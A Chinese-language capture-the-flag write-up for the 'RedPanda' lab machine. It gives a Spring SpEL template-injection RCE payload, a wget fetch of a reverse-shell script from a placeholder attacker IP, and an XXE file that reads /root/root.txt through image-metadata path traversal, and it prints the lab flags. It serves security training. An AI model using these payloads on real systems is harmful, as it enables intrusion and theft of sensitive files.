RedPanda靶机渗透测试教学文档<\/h1>

1. 信息收集<\/h2>

1.1 目标识别<\/h3>

IP地址: 10.10.11.170<\/li>

开放端口:

22\/tcp (SSH - OpenSSH 8.2p1 Ubuntu)<\/li>

8080\/tcp (HTTP - Spring Boot应用)<\/li> <\/ul> <\/li> <\/ul>

1.2 Web应用分析<\/h3>

应用标题: "Red Panda Search | Made with Spring Boot"<\/li>
作者信息: wooden_k<\/li>
前端参考: 基于Codepen上的设计(https:\/\/codepen.io\/khr2003\/pen\/BGZdXw)<\/li>

资源文件:

\/css\/panda.css<\/li>

\/css\/main.css<\/li> <\/ul> <\/li> <\/ul>

2. 漏洞利用<\/h2>

2.1 SSTI (服务器端模板注入)<\/h3>

漏洞位置<\/strong>: HTTP服务(8080端口)存在模板注入漏洞<\/p>

利用方法<\/strong>:<\/p>

基本测试:<\/p>
http:\/\/10.10.11.170:8080\/search?name=*{8*8} <\/code><\/pre> 如果返回64，确认存在SSTI漏洞<\/p> <\/li> 命令执行载荷:<\/p> *{<\/span>T(<\/span>org.<\/span>apache<\/span>.<\/span>commons<\/span>.<\/span>io<\/span>.<\/span>IOUtils<\/span>).<\/span>toString<\/span>(<\/span>T(<\/span>java.<\/span>lang<\/span>.<\/span>Runtime<\/span>).<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>'命令'<\/span>).<\/span>getInputStream<\/span>())}<\/span> <\/span><\/span><\/code><\/pre><\/li> 完整利用步骤:<\/p> 下载反向shell脚本: name=*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('wget http:\/\/攻击者IP:9999\/rev.sh').getInputStream())} <\/code><\/pre> <\/li> 赋予执行权限: name=*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('chmod +x rev.sh').getInputStream())} <\/code><\/pre> <\/li> 执行脚本: name=*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('.\/rev.sh').getInputStream())} <\/code><\/pre> <\/li> <\/ul> <\/li> <\/ol> 2.2 权限提升(Java逆向分析+XXE)<\/h3> 2.2.1 获取Java应用<\/h4> 从目标下载Java应用: scp -i .\/id_rsa woodenk@10.10.11.170:\/opt\/credit-score\/LogParser\/final\/target\/final-1.0-jar-with-dependencies.jar .\/ <\/code><\/pre> <\/li> <\/ul> 2.2.2 应用功能分析<\/h4> 解析\/opt\/panda_search\/redpanda.log文件<\/li> 提取访问JPG图片的请求信息<\/li> 读取图片的Artist属性<\/li> 更新对应\/credits\/_creds.xml文件中的访问统计数据<\/li> <\/ul> 2.2.3 XXE漏洞利用<\/h4> 准备恶意图片:<\/p> exiftool -Artist="..\/tmp\/exp" exp.jpg <\/code><\/pre> Artist属性设置为"..\/tmp\/exp"实现目录穿越<\/li> <\/ul> <\/li> 创建恶意XML文件(\/tmp\/exp_creds.xml):<\/p> <?xml version="1.0" encoding="UTF-8"?><\/span> <\/span><\/span><!DOCTYPE foo [ <\/span><\/span><\/span> <!ENTITY file SYSTEM "\/root\/root.txt"><\/span> <\/span><\/span>]> <\/span><\/span><credits><\/span> <\/span><\/span> <author><\/span>xxx<\/author><\/span> <\/span><\/span> <image><\/span> <\/span><\/span> <uri><\/span>tmp\/exp.jpg<\/uri><\/span> <\/span><\/span> <views><\/span>0<\/views><\/span> <\/span><\/span> <data><\/span>&file;<\/data><\/span> <\/span><\/span> <\/image><\/span> <\/span><\/span> <totalviews><\/span>0<\/totalviews><\/span> <\/span><\/span><\/credits><\/span> <\/span><\/span><\/code><\/pre><\/li> 触发漏洞:<\/p> 修改日志文件: echo "200||test||test|tmp\/exp.jpg" >> \/opt\/panda_search\/redpanda.log <\/code><\/pre> <\/li> 应用会读取exp.jpg的Artist属性("..\/tmp\/exp")<\/li> 尝试加载\/tmp\/exp_creds.xml<\/li> XML中的外部实体(file)会读取\/root\/root.txt内容<\/li> <\/ul> <\/li> <\/ol> 3. 关键文件路径<\/h2> 用户flag: \/home\/woodenk\/user.txt (82505dbb5ab9adee0a0421d9b63840a7)<\/li> root flag: \/root\/root.txt (4f85a578d0e89b0aa9ad4f525fd3213b)<\/li> 日志文件: \/opt\/panda_search\/redpanda.log<\/li> Java应用: \/opt\/credit-score\/LogParser\/final\/target\/final-1..0-jar-with-dependencies.jar<\/li> <\/ul> 4. 技术要点总结<\/h2> SSTI利用<\/strong>:<\/p> Spring Boot应用未对用户输入进行过滤<\/li> 使用SpEL表达式实现RCE<\/li> <\/ul> <\/li> XXE利用<\/strong>:<\/p> 通过图片元数据(Artist)实现路径控制<\/li> 利用XML外部实体注入读取敏感文件<\/li> 需要logs组权限修改日志文件触发<\/li> <\/ul> <\/li> 权限提升路径<\/strong>:<\/p> 初始访问: SSTI → RCE<\/li> 权限提升: 分析Java应用 → 发现XXE → 读取root flag<\/li> <\/ul> <\/li> <\/ol>